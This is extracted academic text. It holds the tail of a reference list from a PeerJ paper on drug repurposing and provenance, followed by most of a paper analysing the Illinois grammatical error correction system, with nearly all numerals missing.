krishna a, poizat p, salaün g. . checking business process evolution. science of computer programming : – doi . /j.scico. . . . kuhn m, campillos m, letunic i, jensen lj, bork p. . a side effect resource to capture phenotypic effects of drugs. molecular systems biology ( ): . lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet j- p, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. . lamprecht a-l, garcia l, kuzak m, martinez c, arcila r, martin del pico e, dominguez del angel v, van de sandt s, ison j, martinez pa, mcquilton p, valencia a, harrow j, psomopoulos f, gelpi jl, chue hong n, goble c, capella- gutierrez s. . towards fair principles for research software. data science ( ): – doi . /ds- . lebo t, sahoo s, mcguinness d, belhajjame k, cheney j, corsar d, garijo d, soiland- reyes s, zednik s, zhao j. . prov-o: the prov ontology. w c. available at https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts. menche j, sharma a, kitsak m, ghiassian sd, vidal m, loscalzo j, barabási a-l. . uncovering disease-disease relationships through the incomplete interactome. science ( ): . moreau l, freire j, futrelle j, mcgrath re, myers j, paulson p. . the open prove- nance model: an overview. in: international provenance and annotation workshop. springer, – . moreira jlr, sales tp, guerson j, braga bfb, brasileiro f, sobral v. . menthor editor: an ontology-driven conceptual modeling platform. in: jowo@fois. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkm http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / - /a http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /ds- https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts http://dx.doi.org/ . /peerj-cs. muehlen m. z, rosemann m. . multi-paradigm process management. in: caise workshops. – . neil ch, daniel sk. . fair enough? can we (already) benefit from applying the fair data principles to software? available at https://figshare.com/articles/fair_ enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_ software_/ doi . /m .figshare. .v . noy nf, shah nh, whetzel pl, dai b, dorf m, griffith n, jonquet c, rubin dl, storey m-a, chute cg, musen ma. . bioportal: ontologies and integrated data re- sources at the click of a mouse. nucleic acids research (web server):w –w doi . /nar/gkp . pimentel jf, murta l, braganholo v, freire j. . a large-scale study about quality and reproducibility of jupyter notebooks. in: proceedings of the th international conference on mining software repositories. ieee press, – . prinz f, schlange t, asadullah k. . believe it or not: how much can we rely on pub- lished data on potential drug targets? nature reviews drug discovery ( ): – doi . /nrd -c . ren y, grner g, lemcke j, rahmani t, friesen a, zhao y, pan jz, staab s. . process refinement validation and explanation with ontology reasoning. service- oriented computing, berlin: springer, – . rosemann m, vom brocke j. . the six core elements of business process man- agement. in: vom brocke j, rosemann m, eds. handbook on business process management : introduction, methods, and information systems. berlin, heidelberg: springer, – doi . / - - - - _ - - - - . rospocher m, ghidini c, serafini l. . an ontology for the business process modelling notation. formal ontology in information systems - proceedings of the eighth international conference, fois , september, – , , rio de janeiro, brazil. ios press – . samuel s, könig-ries b. a. combining p-plan and the reproduce-me ontology to achieve semantic enrichment of scientific experiments using interactive note- books. in: european semantic web conference. springer, – . samuel s, könig-ries b. b. provbook: provenance-based semantic enrichment of interactive notebooks for reproducibility. in: proceedings of the iswc posters demonstrations, industry and blue sky ideas tracks co-located with iswc. scannell jw, blanckley a, boldon h, warrington b. . diagnosing the decline in pharmaceutical r&d efficiency. nature reviews drug discovery ( ): – doi . /nrd . sirota m, dudley jt, kim j, chiang ap, morgan aa, sweet-cordero a, sage j, butte aj. . discovery and preclinical validation of drug indications using compendia of public gene expression data. science translational medicine ( ): ra – ra doi . /scitranslmed. . sleigh sh, barton cl. . repurposing strategies for therapeutics. pharmaceutical medicine ( ): – doi . /bf . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /nrd -c http://dx.doi.org/ . / - - - - _ - - - - http://dx.doi.org/ . /nrd http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. soiland-reyes s, khan fz, sinnott r, lonie a, crusoe mr, goble c. . capturing interoperable reproducible workflows. in: workshop on research objects: workshop at ieee escience . stephan b, thomas b, manfred r. . bridging the gap between business process models and service composition specifications. in: jonathan l, shang-pin m, alan l, eds. service life cycle tools and technologies: methods, trends and advances. hershey: igi global, – doi . / - - - - .ch . vasilevsky na, brush mh, paddock h, ponting l, tripathy sj, larocca gm, haendel ma. . on the reproducibility of science: unique identification of research resources in the biomedical literature. peerj :e –e doi . /peerj. . wilkinson md, dumontier m, aalbersberg ij, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray a. jg, groth p, goble c, grethe js, heringa j, t hoen p. ac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. nature : doi . /sdata. . . wishart ds, knox c, guo ac, cheng d, shrivastava s, tzur d, gautam b, hassanali m. . drugbank: a knowledgebase for drugs, drug actions and drug targets. nucleic acids research (suppl_ ):d –d . wu c, gudivada rc, aronow bj, jegga ag. . computational drug repositioning through heterogeneous network clustering. bmc systems biology (suppl ):s –s doi . / - - -s -s . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /peerj-cs. building a state-of-the-art grammatical error correction system alla rozovskaya center for computational learning systems columbia university new york, ny alla@ccls.columbia.edu dan roth department of computer science university of illinois urbana, il danr@illinois.edu abstract this paper identifies and examines the key principles underlying building a state-of-the- art grammatical error correction system. we do this by analyzing the illinois system that placed first among seventeen teams in the re- cent conll- shared task on grammatical error correction. the system focuses on five different types of errors common among non-native english writers. we describe four design principles that are relevant for correcting all of these er- rors, analyze the system along these dimen- sions, and show how each of these dimensions contributes to the performance. introduction the field of text correction has seen an increased interest in the past several years, with a focus on correcting grammatical errors made by english as a second language (esl) learners. three competi- tions devoted to error correction for non-native writ- ers took place recently: hoo- (dale and kil- garriff, ), hoo- (dale et al., ), and the conll- shared task (ng et al., ). the most recent and most prominent among these, the conll- shared task, covers several common esl errors, including article and preposition usage mistakes, mistakes in noun number, and various verb errors, as illustrated in fig. . seventeen teams that the conll- shared task that completed at the time of writing this paper was an extension of the conll- com- petition (ng et al., ) but addressed all types of errors. the illinois-columbia submission, a slightly extended version of the nowadays *phone/phones *has/have many functionalities, *included/including *∅/a camera and *∅/a wi-fi receiver. figure : examples of representative esl errors. participated in the task developed a wide array of ap- proaches that include discriminative classifiers, lan- guage models, statistical machine-translation sys- tems, and rule-based modules. many of the systems also made use of linguistic resources such as addi- tional annotated learner corpora, and defined high- level features that take into account syntactic and se- mantic knowledge. even though the systems incorporated similar re- sources, the scores varied widely. the top system, from the university of illinois, obtained an f score of . , while the second team scored . and the median result was . points. these results suggest that there is not enough understanding of what works best and what elements are essential for building a state-of-the-art error correction system. in this paper, we identify key principles for build- ing a robust grammatical error correction system and show their importance in the context of the shared task. we do this by analyzing the illinois system and evaluating it along several dimensions: choice illinois conll- system, ranked at the top. for a descrip- tion of the illinois-columbia submission, we refer the reader to rozovskaya et al. ( a). the state-of-the-art performance of the illinois system dis- cussed here is with respect to individual components for differ- ent errors. improvements in rozovskaya and roth ( ) over the illinois system that are due to joint learning and inference are orthogonal, and the analysis in this paper still applies there. f might not be the ideal metric for this task but this was the one chosen in the evaluation. see more in sec. . transactions of the association for computational linguistics, ( ) – . action editor: alexander koller. submitted / ; revised / ; published / . c© association for computational linguistics. of learning algorithm; choice of training data (native or annotated learner data); model adaptation to the mistakes made by the writers; and the use of linguis- tic knowledge. for each dimension, several imple- mentations are compared, including, when possible, approaches chosen by other teams. we also vali- date the obtained results on another learner corpus. overall, this paper makes two contributions: ( ) we explain the success of the illinois system, and ( ) we provide an understanding and qualitative analysis of different dimensions that are essential for success in this task, with the goal of aiding future research on it. given that the illinois system has been the top system in four competitive evaluations over the last few years (hoo and conll), we believe that the analysis we propose will be useful for researchers in this area. in the next section, we present the conll- competition. sec. gives an overview of the ap- proaches adopted by the top five teams. sec. de- scribes the illinois system. in sec. , the analysis of the illinois system is presented. sec. offers a brief discussion, and sec. concludes the paper. task description the conll- shared task focuses on five common mistakes made by esl writers: arti- cle/determiner, preposition, noun number, verb agreement, verb form. the training data of the shared task is the nucle corpus (dahlmeier et al., ), which contains essays written by learners of english (we also refer to it as learner data or shared task training data). the test data consists of essays by students from the same linguistic back- ground. the training and the test data contain . m and k words, respectively. table shows the number of errors by type and the error rates. determiner errors are the most com- mon and account for . % of all errors in training. note that the test data contains a much larger pro- portion of annotated mistakes; e.g. determiner errors occur four times more often in the test data than in the training data (only . % of noun phrases in the training data have determiner errors, versus % in the test data). the differences might be attributed to differences in annotation standards, annotators, or writers, as the test data was annotated at a later time. the shared task provided two sets of test an- error number of errors and error rates train test art. ( . %) ( . %) prep. ( . %) ( . %) noun ( . %) ( . %) verb agr. ( . %) ( . %) verb form ( . %) ( . %) table : statistics on annotated errors in the conll- shared task data. percentage denotes the error rates, i.e. the number of erroneous instances with respect to the total number of relevant instances in the data. notations: the original annotated data and a set with additional revisions that also includes alternative an- notations proposed by participants. clearly, having alternative answers is the right approach as there are typically multiple ways to correct an error. how- ever, because the alternatives are based on the error analysis of the participating systems, the revised set may be biased (ng et al., ). consequently, we report results on the original set. model dimensions table summarizes approaches and methodologies of the top five systems. the prevailing approach consists in building a statistical model either on learner data or on a much larger corpus of native en- glish data. for native data, several teams make use of the web t -gram corpus (henceforth web t, (brants and franz, )). nara employs a statis- tical machine translation model for two error types; two systems have rule-based components for se- lected errors. based on the analysis of the illinois system, we identify the following, inter-dependent, dimensions that will be examined in this work: . learning algorithm: most of the teams, includ- ing illinois, built statistical models. we show that the choice of the learning algorithm is very impor- tant and affects the performance of the system. . adaptation to learner errors: previous stud- ies, e.g. (rozovskaya and roth, ) showed that adaptation, i.e. developing models that utilize knowledge about error patterns of the non-native writers, is extremely important. we summarize adaptation techniques proposed earlier and examine their impact on the performance of the system. . linguistic knowledge: it is essential to use some linguistic knowledge when developing error correc- tion modules, e.g., to identify which type of verb system error approach illinois (rozovskaya et al., ) art. ap model on nucle with word, pos, shallow parse features prep. nb model trained on web t and adapted to learner errors noun/agr./form nb model trained on web t nthu (kao et al., ) all count model with backoff trained on web t hit (xiang et al., ) art./prep./noun me on nucle with word, pos, dependency features agr./form rule-based nara (yoshimoto et al., ) art./prep. smt model trained on learner data from lang- corpus noun me model on nucle with word, pos and dependency features agr./form treelet lm on gigaword and penn treebank corpora umc (xing et al., ) art./prep. two lms – on nucle and web t corpus – with voting noun rules and me model on nucle + lm trained on web t agr./form me model on nucle (agr.) and rules (form) table : top systems in the conll- shared task. the second column indicates the error type; the third column describes the approach adopted by the system. me stands for maximum entropy; lm stands for language model; smt stands for statistical machine translation; ap stands for averaged perceptron; nb stands for naı̈ve bayes. classifier art. prep. noun agr. form train k k k k k test k . k . k . k . k table : number of candidate words by classifier type. error occurs in a given context, before the appropri- ate correction module is employed. we describe and evaluate the contribution of these elements. . training data: we discuss the advantages of training on learner data or native english data in the context of the shared task and in broader context. the illinois system the illinois system consists of five machine-learning models, each specializing in correcting one of the er- rors described above. the words that are selected as input to a classifier are called candidates (table ). in the preposition system, for example, candidates are determined by surface forms. in other systems, determining the candidates might be more involved. all modules take as input the corpus documents pre-processed with a part-of-speech tagger (even- zohar and roth, ) and shallow parser (pun- yakanok and roth, ). in the illinois submis- sion, some modules are trained on native data, oth- ers on learner data. the modules trained on learner data make use of a discriminative algorithm, while http://cogcomp.cs.illinois.edu/page/ software view/pos http://cogcomp.cs.illinois.edu/page/ software view/chunker native-trained modules make use of the naı̈ve bayes (nb) algorithm. the illinois system has an option for a post-processing step where corrections that al- ways result in a false positive in training are ignored but this option is not used here. . determiner errors the majority of determiner errors involve articles, although some errors also involve pronouns. the illinois system addresses only article errors. can- didates include articles (“a”,“an”,“the”) and omis- sions, by considering noun-phrase-initial contexts where an article is likely to be omitted. the con- fusion set for articles is thus {a, the, ∅}. the ar- ticle classifier is the same as the one in the hoo shared tasks (rozovskaya et al., ; rozovskaya et al., ), where it demonstrated superior per- formance. it is a discriminative model that makes use of the averaged perceptron algorithm (ap, (fre- und and schapire, )) implemented with lbjava (rizzolo and roth, ) and is trained on learner data with rich features and adaptation to learner er- rors. see sec. . and sec. . . . preposition errors similar to determiners, we distinguish three types of preposition mistakes: choosing an incorrect prepo- sition, using a superfluous preposition, and omitting a preposition. in contrast to determiners, for learn- ers of many first language backgrounds, most of the preposition errors are replacements, i.e., where the the variants “a” and “an” are collapsed to one class. “hence, the environmental factors also *contributes/ contribute to various difficulties, *giving/given prob- lems in nuclear technology.” error confusion set agr. {inf=contribute, s=contributes} form {inf=give, ed=given, ing=giving, s=gives } table : confusion sets for agreement and form. for irreg- ular verbs, the second candidate in the confusion set for verb form is the past participle. author correctly recognized the need for a prepo- sition, but chose the wrong one (leacock et al., ). however, learner errors depend on the first language; in nucle, spurious prepositions occur more frequently: % versus % of all preposition mistakes in other learner corpora (rozovskaya and roth, a; yannakoudakis et al., ). the illinois preposition classifier is a nb model trained on web t that uses word n-gram features in the -word window around the preposition. the -word window refers to the four words before and the four words after the preposition, e.g. “problem as the search of alternative resources to the” for the preposition “of”. features consist of word n-grams of various lengths spanning the target preposition. for example, “the search of” is a -gram feature. the model is adapted to likely preposition confu- sions using the priors method (see sec. . ). the illinois model targets replacement errors of the most common english prepositions. here we aug- ment it to identify spurious prepositions. the con- fusion set for prepositions is as follows: {in, of, on, for, to, at, about, with, from, by, into, during, ∅}. . agreement and form errors the illinois system implements two verb modules – agreement and form – that consist of the following components: ( ) candidate identification; ( ) deter- mining the relevant module for each candidate based on verb finiteness; ( ) correction modules for each error type. the confusion set for verbs depends on the target word and includes its morphological vari- ants (table ). for irregular verbs, the past partici- ple form is included, while the past tense form is not (i.e. “given” is included but “gave” is not), since tense errors are not part of the task. to generate morphological variants, the system makes use of a morphological analyzer verbmorph; it assumes ( ) a list of valid verb lemmas (compiled using a pos- dimension systems used in the comparison learn. alg. (sec. . ) nthu, umc adaptation (sec. . ) error inflation: hit ling. knowledge cand. identification: nthu, hit (sec. . ) verb finiteness: nthu train. data (sec. . ) hit, nara table : system comparisons. column indicates the di- mension, and column lists systems whose approaches provide a relevant point of comparison. tagged version of the nyt section of the gigaword corpus) and ( ) a list of irregular english verbs. candidate identification stage selects the set of words that are presented as input to the classifier. this is a crucial step: errors missed at this stage will not be detected by the later stages. see sec. . . verb finiteness is used in the illinois system to sep- arately process verbs that fulfill different grammati- cal functions and thus are marked for different gram- matical properties. see sec. . . correction modules the agreement module is a bi- nary classifier. the form module is a -class system. both classifiers are trained on the web t corpus. . noun errors noun number errors involve confusing singular and plural noun forms (e.g. “phone” instead of “phones” in fig. ) and are the second most common error type in the nucle corpus after determiner mistakes (table ). the illinois noun module is trained on the web t corpus using nb. similar to verbs, candi- date identification is an important step in the noun classifier. see sec. . . system analysis in this section, we evaluate the illinois system along the four dimensions identified in sec. , compare its components to alternative configurations imple- mented by other teams, and present additional exper- iments that further analyze each dimension. while a direct comparison with other systems is not always possible due to other differences between the sys- tems, we believe that these results are still useful. table lists systems used for comparion. it is im- portant to note that the dimensions are not indepen- dent. for instance, there is a correlation between algorithm choice and training data. the tool and more detail about it can be found at http://cogcomp.cs.illinois.edu/page/publication view/ results are reported on the test data using f com- puted with the conll scorer (dahlmeier and ng, ). error-specific results are generated based on the output of individual modules. note that these are not directly comparable to error-specific results in the conll overview paper: the latter are approx- imate as the organizers did not have the error type information for corrections in the output. the com- plete system includes the union of corrections made by each of these modules, where the corrections are applied in order. ordering overlapping candidates might potentially affect the final output, when mod- ules correctly identify an error but propose differ- ent corrections, but this does not happen in practice. modules that are part of the illinois submission are marked with an asterisk in all tables. to demonstrate that our findings are not spe- cific to conll, we also show results on the fce dataset. it is produced by learners from seventeen first language backgrounds and contains , words from the cambridge learner corpus (clc) (yannakoudakis et al., ). we split the corpus into two equal parts – training and test. the statis- tics are shown in appendix tables a. and a. . . dim. : learning algorithm rozovskaya and roth ( , sec. ) discuss the re- lations between the amount of training data, learn- ing algorithms, and the resulting performance. they show that on training sets of similar sizes, discrimi- native classifiers outperform other machine learning methods on this task. following these results, the illinois article module that is trained on the nucle corpus uses the discriminative approach ap. most of the other teams that train on the nucle corpus also use a discriminative method. however, when a very large native training set such as the web t corpus is available, it is often ad- vantageous to use it. the web t corpus is a collec- tion of n-gram counts of length one to five over a cor- pus of words. since the corpus does not come with complete sentences, it is not straightforward to make use of a discriminative classifier because of the limited window provided around each example: training a discriminative model would limit the sur- overlapping candidates are included in more than one module: if “work” is tagged as nn, it is included in the noun module, but also in the form module (as a valid verb lemma). rounding context features to a -word window. be- cause we wish to make use of the context features that extend beyond the -word window, it is only possible to use count-based methods, such as nb or lm. several teams make use of the web t corpus: umc uses a count-based lm for article, preposition, and noun number errors; nthu addresses all errors with a count-based model with backoff, which is es- sentially a variation of a language model with back- off. the illinois system employs the web t corpus for all errors, except articles, using nb. training naı̈ve bayes for deletions and inser- tions the reason for not using the web t corpus for article errors is that training nb on web t for deletions and insertions presents a problem, and the majority of article errors are of this type. recall that web t contains only n-gram counts, which makes it difficult to estimate the prior count for the ∅ candi- date. (with access to complete sentences, the prior of ∅ is estimated by counting the total number of ∅ candidates; e.g., in case of articles, the number of nps with ∅ article is computed.) we solve this prob- lem by treating the article and the word following it as one target. for instance, to estimate prior counts for the article candidates in front of the word “cam- era” in “including camera”, we obtain counts for “camera”, “a camera”, “the camera”. in the case of the ∅ candidate, the word “camera” acts as the tar- get. thus, the confusion set for the article classifier is modified as follows: instead of the three articles (as shown in sec. . ), each member of the confu- sion set is a concatenation of the article and the word that follows it, e.g. {a camera, the camera, cam- era}. the counts for contextual features are obtained similarly, e.g. a feature that includes a preceding word would correspond to the count of “including x”, where x can take any value from the confusion set. the above solution allows us to train nb for ar- ticle errors and to extend the preposition classifier to handle extraneous preposition errors (table ). rozovskaya and roth ( ) study several algo- rithms trained on the web t corpus and observe that, when evaluated with the same context win- dow size, nb performs better than other count-based methods. in order to show the impact of the algo- rithm choice, in table , we compare lm and nb models. both models use word n-grams spanning the target word in the -word window. we train lms error model f conll fce art. lm . . nb . . prep. lm . . nb . . noun lm . . nb* . . agr. lm . . nb* . . form lm . . nb* . . table : comparison of learning models. web t corpus. modules that are part of the illinois submission are marked with an asterisk. source candidates ed inf ing s ed . . . . inf . . . . ing . . . . s . . . . table : priors confusion matrix used for adapting nb. each entry shows prob(candidate|source), where source corre- sponds to the verb form chosen by the author. with srilm (stolcke, ) using jelinek-mercer linear interpolation as a smoothing method (chen and goodman, ). on the conll test data, nb outperforms lm on all errors; on the fce corpus, nb is superior on all errors, except preposition er- rors, where lm outperforms nb only very slightly. we attribute this to the fact that the preposition prob- lem has more labels; when there is a big confusion set, more features have default smooth weights, so there is no advantage to running nb. we found that with fewer classes ( rather than prepositions), nb outperforms lm. it is also possible that when we have a lot of labels, the theoretical difference be- tween the algorithms disappears. note that nb can be improved via adaptation (next section) and then it outperforms the lm also for preposition errors. . dim. : adaptation to learner errors in the previous section, the models were trained on native data. these models have no notion of the er- ror patterns of the learners. here we discuss model adaptation to learner errors, i.e. developing models that utilize the knowledge about the types of mis- takes learners make. adaptation is based on the fact that learners make mistakes in a systematic manner, e.g. errors are influenced by the writer’s first lan- guage (gass and selinker, ; ionin et al., ). there are different ways to adapt a model that de- pend on the type of training data (learner or native) and the algorithm choice. the key application of adaptation is for models trained on native english data, because the learned models do not know any- thing about the errors learners make. with adapta- tion, models trained on native data can use the au- thor’s word (the source word) as a feature and thus propose a correction based on what the author orig- inally wrote. this is crucial, as the source word is an important piece of information (rozovskaya and roth, b). below, several adaptation techniques are summarized and evaluated. the illinois system makes use of adaptation in the article model via the inflation method and adapts its nb preposition clas- sifier trained on web t with the priors method. adapting nb the priors method (rozovskaya and roth, , sec. ) is an adaptation technique for a nb model trained on native english data; it is based on changing the distribution of priors over the cor- rection candidates. candidate prior is a special pa- rameter in nb; when nb is trained on native data, candidate priors correspond to the relative frequen- cies of the candidates in the native corpus and do not provide any information on the real distribution of mistakes and the dependence of the correction on the word used by the author. in the priors method, candidate priors are changed using an error confusion matrix based on learner data that specifies how likely each confusion pair is. table shows the confusion matrix for verb form errors, computed on the nucle data. adapted pri- ors are dependent on the author’s original verb form used: let s be a form of the verb appearing in the source text, and c a correction candidate. then the adapted prior of c given s is: prior(c|s) = c(s, c) c(s) where c(s) denotes the number of times s appeared in the learner data, and c(s, c) denotes the number of times c was the correct form when s was used by a writer. the adapted priors differ by the source: the probability of candidate inf when the source form is s, is more than twice than when the source form is error model f conll fce train test art. nb . . . nb-adapted . . . prep. nb . . . nb-adapted* . . . noun nb* . . . nb-adapted . . . agr. nb* . . . nb-adapted . . . form nb* . . . nb-adapted . . . table : adapting nb with the priors method. all models are trained on the web t corpus. modules that are part of the illinois submission are marked with an asterisk. ed; the probability that s is the correct form is very high, which reflects the low error rates. table compares nb and nb-adapted models. because of the dichotomy in the error rates in conll training and test data, we also show exper- iments using -fold cross-validation on the training data. adaptation always helps on the conll train- ing data and the fce data (except noun errors), but on the test data it only helps on article and verb form errors. this is due to discrepancies in the error rates, as adaptation exploits the property that learner errors are systematic. indeed, when priors are estimated on the test data (in -fold cross-validation), the perfor- mance improves, e.g. the preposition module attains an f of . instead of . . concerning lack of improvement on noun num- ber errors, we hypothesize that these errors differ from the other mistakes in that the appropriate form strongly depends on the surface form of the noun, which would, in turn, suggest that the dependency of the label on the grammatical form of the source that the adaptation is trying to discover is weak. in- deed, the prior distribution of {singular, plural} la- bel space does not change much when the source feature is taken into account. the unadapted priors for “singular” and “plural” are . and . , respec- tively. similarly, the adapted priors (singular|plural) and (plural|singular) are . and . , respec- tively. in other words, the unadapted prior probabil- ity for “plural” is three times lower than for “singu- lar”, which does not change much with adaptation. this is different for other errors. for instance, in case of verb agreement, the unadapted prior for “plu- ral” is . , more than three times than the “sin- gular” prior of . . with adaptation, these priors become almost the same ( . and . ). adapting ap the ap is a discriminative learning algorithm and does not use priors on the set of can- didates. in order to reflect our estimate of the error distribution, the ap algorithm is adapted differently, by introducing into the native data artificial errors, in a rate that reflects the errors made by the esl writers (rozovskaya and roth, b). the idea is to simulate learner errors in training, through arti- ficial mistakes (also produced using an error confu- sion matrix). the original method was proposed for models trained on native data. this technique can be further enhanced using the error inflation method (rozovskaya et al., , sec. ) applied to models trained on native or learner data. the illinois system uses error inflation in its ar- ticle classifier. because this classifier is trained on learner data, the source article can be used as a fea- ture. however, since learner errors are sparse, the source feature encourages the model to abstain from flagging a mistake, which results in low recall. the error inflation technique addresses this problem by boosting the proportion of errors in the training data. it does this by generating additional artificial errors using the error distribution from the training set. table shows the results of adapting the ap clas- sifier using error inflation. (we omit noun results, since the noun ap model performs better without the source feature, which is similar to the noun nb model, as discussed above.) the inflation method improves recall and, consequently, f . it should be noted that although inflation also decreases preci- sion it is still helpful. in fact, because of the low error rates, performance on the conll dataset with natural errors is very poor, often resulting in f be- ing equal to due to no errors being detected. inflation vs. sampling to demonstrate the impact of error inflation, we compare it against sampling, an approach used by other teams – e.g. hit – that improves recall by removing correct examples in training. the hit article model is similar to the the idea of using artificial errors goes back to izumi et al. ( ) and was also used in foster and andersen ( ). the approach discussed here refers to the adaptation method in ro- zovskaya and roth ( b) that generates artificial errors using the distribution of naturally-occurring errors. error model f conll fce art. ap (natural errors) . . ap (infl. const. . )* . . prep. ap (natural errors) . . ap (infl. const. . ) . . agr. ap (natural errors) . . ap (infl. const. . ) . . form ap (natural errors) . . ap (infl. const. . ) . . table : adapting ap using error inflation. models are trained on learner data with word n-gram features and the source feature. inflation constant shows how many correct instances remain (e.g. . indicates that % of correct examples are un- changed, while % are converted to mistakes.) modules that are part of the illinois submission are marked with an asterisk. infl. constant f sampling inflation . . . . . . . . . . . . . . . table : comparison of the inflation and sampling meth- ods on article errors (conll). the proportion of errors in training in each row is identical. illinois model but scored three points below. ta- ble shows that sampling falls behind the inflation method, since it considerably reduces the training size to achieve similar error rates. the proportion of errors in training in each row is identical: sampling achieves the error rates by removing correct exam- ples, whereas the inflation method converts some positive examples to artificial mistakes. inflation constant shows how many correct instances remain; smaller inflation values correspond to more erro- neous instances in training; the sampling approach, correspondingly, removes more positive examples. to summarize, we have demonstrated the impact of error inflation by comparing it to a similar method used by another team; we have also shown that fur- ther improvements can be obtained by adapting nb to learner errors using the priors method, when train- ing and test data exhibit similar error patterns. . dim. : linguistic knowledge the use of linguistic knowledge is important in sev- eral components of the error correction system: fea- ture engineering, candidate identification, and spe- error features f conll fce art. n-gram . . n-gram+pos+chunk* . . agr. n-gram . . n-gram+pos . . n-gram+pos+syntax . . table : feature evaluation. models are trained on learner data, use the source word and error inflation. modules that are part of the illinois submission are marked with an asterisk. cial techniques for correcting verb errors. features it is known from many nlp tasks that feature engineering is important, and this is the case here. note that this is relevant only when training on learner data, as models trained on web t can make use of n-gram features only but for the nucle cor- pus we have several layers of linguistic annotation. we found that for article and agreement errors, using deeper linguistic knowledge is especially beneficial. the article features in the illinois module, in addi- tion to the surface form of the context, encode pos and shallow parse properties. these features are pre- sented in rozovskaya et al. ( , table ) and ap- pendix table a. . the illinois agreement module is trained on web t but further analysis reveals that it is better to train on learner data with rich features. the word n-gram and pos agreement features are the same as those in the article module. syntactic features encode properties of the subject of the verb and are presented in rozovskaya et al. ( b, table ) and appendix table a. ; these are based on the syntactic parser (klein and manning, ) and the dependency converter (marneffe et al., ). table shows that adding rich features is help- ful. notably, adding deeper syntactic knowledge to the agreement module is useful, although parse features are likely to contain more noise. foster ( ) and lee and seneff ( ) observe a degrade in performance on syntactic parsers due to grammat- ical noise that also includes agreement errors. for articles, we chose to add syntactic knowledge from shallow parse as it is likely to be sufficient for arti- cles and more accurate than full-parse features. candidate identification for errors on open-class feature engineering will also be relevant when training on a native corpus that has linguistic annotation. parse features have also been found useful in preposition error correction (tetreault et al., ). words is rarely discussed but is a crucial step: it is not possible to identify the relevant candidates us- ing a closed list of words, and the procedure needs to rely on pre-processing tools, whose performance on learner data is suboptimal. rozovskaya et al. ( b, sec. . ) describe and evaluate several can- didate selection methods for verbs. the illinois sys- tem implements their best method that addresses pre-processing errors, by selecting words tagged as verbs as well as words tagged as nn, whose lemma is on the list of valid verb lemmas (sec. . ). following descriptions provided by several teams, we evaluate several candidate selection methods for nouns. the first method includes words tagged as nn or nns that head an np. nthu and hit use this method; nthu obtained the second best noun score, after the illinois system; its model is also trained on web t. the second method includes all words tagged as nn and nns and is used in several other systems, e.g. szeg, (berend et al., ). the above procedures suffer from pre-processing errors. the illinois method addresses this problem by adding words that end in common noun suffixes, e.g. “ment”, “ments”, and “ist”. the percentage of noun errors selected as candidates by each method and the impact of each method on the performance are shown in table . the illinois method has the best result on both datasets; on conll, it improves f score by points and recovers % of the candi- dates that are missed by the first approach. on fce, the second method is able to recover more erroneous candidates, but it does not perform as well as the last method, possibly, due to the number of noisy candidates it generates. to conclude, pre-processing mistakes should be taken into consideration, when correcting errors, especially on open-class words. using verb finiteness to correct verb errors as shown in table , the surface realizations that cor- respond to the agreement candidates are a subset of the possible surface realizations of the form classi- fier. one natural approach, thus, is to train one clas- sifier to predict the correct surface form of the verb. however, the same surface realization may corre- spond to multiple grammatical properties. this ob- candidate selection is also difficult for closed-class errors in the case of omissions, e.g. articles, but article errors have been studied rather extensively, e.g. (han et al., ), and we have no room to elaborate on it here. candidate error recall (%) f ident. method conll fce conll fce np heads . . . . all nouns . . . . nouns+heuristics* . . . . table : nouns: effect of candidate identification methods on the correction performance. models are trained using nb. error recall denotes the percentage of nouns containing number errors that are selected as candidates. modules that are part of the illinois submission are marked with an asterisk. training method f conll fce one classifier . . finiteness-based training (i) . . finiteness-based training (ii) . . table : improvement due to separate training for verb errors. models are trained using the ap algorithm. servation motivates the approach that corrects agree- ment and form errors separately (rozovskaya et al., b). it uses the linguistic notion of verb finite- ness (radford, ) that distinguishes between fi- nite and non-finite verbs, each of which fulfill differ- ent grammatical functions and thus are marked for different grammatical properties. verb finiteness is used to direct each verb to the appropriate classifier. the candidates for the agree- ment module are verbs that take agreement markers: the finite surface forms of the be-verbs (“is”, “are”, “was”, and “were”), auxiliaries “have” and “has”, and finite verbs tagged as vb and vbz that have ex- plicit subjects (identified with the parser). the form candidates are non-finite verbs and some of the verbs whose finiteness is ambiguous. table compares the two approaches: when all verbs are handled together; and when verbs are pro- cessed separately. all of the classifiers use surface form and pos features of the words in the -word window around the verb. several subsets of these features were tried; the single classifier uses the best combination, which is the same word and pos fea- tures shown in appendix table a. . finiteness- based classifier (i) uses the same features for agree- ment and form as the single classifier. when training 